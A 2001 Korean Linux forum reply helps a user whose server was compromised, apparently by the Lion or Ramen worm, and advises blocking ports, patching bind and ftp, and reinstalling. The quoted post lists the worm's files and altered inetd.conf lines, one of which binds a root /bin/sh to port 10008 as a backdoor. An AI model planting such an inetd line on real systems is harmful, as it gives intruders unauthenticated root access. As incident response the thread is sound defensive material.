>> Read Reply from No. 28600 article  
RE: 크래킹이라기 보다는 웜인거 같네요....

등록 2001-04-27 17:24:00     조회 1
이름 son    

		: [현상5]
: /etc/rc.d/rc.sysinit화일내 마지막 라인에
: "/dev/.lib/star.sh"추가 되어있다.
:
: /dev/.lib 디렉토리에는
: [ohsj@oh .lib]$ ls
: asp62*        bindx.sh*     index.html    scan.sh*
: bind*         hack.sh*      pscan*        star.sh*
: bindname.log  index.htm     randb
: [ohsj@oh .lib]$
: 이러한 화일들이 있으며 hacking과 관련된 화일로 보여진다.
:
: [현상6]
: /etc/rc.d/rc5.d디렉토리의 모든 화일들이 갱신되었으며
: -rwxr-xr-x   1 root     root          392 Apr 26 22:49 S80rpcmap*
: 위와 같은 화일도 있음.
: 모든 링크된 화일은 깨져있는지 화면상 깜박거림.
:
: [현상7]
: /etc/inetd.conf 화일내용이 변경된것 같음
:
: #
: # Authentication
: #
: auth   stream  tcp     nowait    nobody    /usr/sbin/in.identd
: in.identd -l -e -
: o
: #
: # End of inetd.conf
:
: linuxconf stream tcp wait root /bin/linuxconf linuxconf --http
: #swat      stream  tcp     nowait.400      root /usr/sbin/swat swat
:
: linuxconf stream tcp wait root /bin/linuxconf linuxconf --http
:
: linuxconf stream tcp wait root /bin/linuxconf linuxconf --http
: #swat      stream  tcp     nowait.400      root /usr/sbin/swat swat
: #swat      stream  tcp     nowait.400      root /usr/sbin/swat swat
: 10008 stream tcp nowait root /bin/sh sh
: asp stream tcp nowait root /sbin/asp
:
: 위와 같은 현상들이 있읍니다.
 -------------------------------------------------------------------
 위와 같은 흔적이 있다니 아무래도 요즘 유행하는 인터넷 웜에 당하신거
같군요...
 라멘이나 라이온 웜 같은경우 위와 같은 흔적이 남더라군요...
근데...  bind*   같은게 있는거 보니까... 아무래도 네임서버의 취약점을
이용한 라이온 웜 같군요...
 저도 예전에 라면웜에 당한적이 있는데...
라면웜의 경우 홈페이지만 조금 망친거 외에는 별다른 이상이 없어서...
위의 파일들을 지우고나서 홈페이지만 복구후 사용했었습니다.
 그렇지만... 역시 해킹당한 이후에는 자꾸만 이상한 에러들이 발생해서
결국 시스템을 새로 깔아 버렸습니다.. -_-;;
 일단 제 생각에는 그런거 같군요...
그러니 일단 바로 2차 해킹이나 백도어를 이용한 크래킹이 들어 오지는
않을거라 생각합니다... 그러니 당장 급한대로는 서버를 이용하는데
큰 지장은 없으리라 생각됩니다만... (웜의 특성상 특정 대상을 공격하는
것이 아니라서...)
 백도어가 확실히 있으므로 일단 포트 웬만한건 다 막아 버리시고,
(특히 10008, asp 에 열려있는 포트는 ... 이 포트가 웜이 생성한 포트... )
telnet, ftp, mail 모두 외부 접속을 막아 버리시고,
./lib 디렉토리를 이름을 바꿔 버리시구..
bind, ftp를 패치 하시고, 기타 훼손된 자료들을 복구하시면, 대충
임시로를 사용하신다 해도 별 무리는 없을 겁니다만...
 오래두시면 틀림없이 누군가 침입합니다... -_-;;
제 서버에도 몇번의 재 침입 시도가 있었고, 제가 모르게 아이디로
슬쩍 만들었더군요...
 역시 일단 해킹 당하면, 아예 시스템을 새로 설치하는것이 좋을듯
합니다... 모든 백도어를 찾기는 거의 불가능할듯 한데다...
실제도 백도어가 없다고 해도, 역시 계속 찜찜한 느낌이 들거둔요... -_-;;
이름
암호


>> 관련글
28600 hacking된 서버!! 도움부탁드립니다.  사슴  2001.04.27  ....
  답장 RE: 크래킹이라기 보다는 웜인거 같네요....  son  2001.04.27  ....
Register [ localhost 목록보기 윗글 아랫글
글쓰기
답장쓰기 수정 삭제
정규표현식 [ 상세 검색 ]
페이지로딩: [ 1.70 초 ] 작업시간: [ 1.25 초 ]

Copyleft 1999-2026 by JSBoard Open Project
Theme Designed by IDOO All right reserved
[TOP]

적수네 동네
+
| 적수네 동네
| 공부방
| 리눅스 잡지 서고
| LSN 소스
| 링크 모음
+---+
게시판
+
| 떠들어보세!
| 질문과 답변
| 새소식과 정보
| 1원짜리 팁?
| 대화방
+---+
칼럼?
+
| 세하 훔쳐보기
| Welcome2nite
| 혜진의 염장판
+---+
리눅스 상표권
+
| 반대 서명란
| 토론 게시판
+---+
GNU
+
| GNU 선언문
| GNU GPL
| GNU 미러 목록
+---+
프로젝트?
+
| 리눅스카운터
| RC5DES
| 실질헌법 제작
+---+
커널 소식
+
| 안정 버젼: 2.4.14
+---+
테마 선택
+
LSN 방송국?
+
| OFF AIR
+---+
회원
+
| 로그인
+---+
[ 적수네 동네 ] [ 리눅스 상표권 독점 반대 ] [ 한글 리눅스 문서 프로젝트 ] [ KrLine ] [ 사랑넷 ] [ Valid HTML 4.0! ] [ SlashDot ] [ Freshmeat ]
Copyleft (C) 1998-2001 Byeong-Chan Kim . License
TIME: 1789564167
System by WYZsoft, HDD by I.O.Linux, Mizi Research, Embryo, WOWLINUX, Domain by SarangNet, Network by KrLine.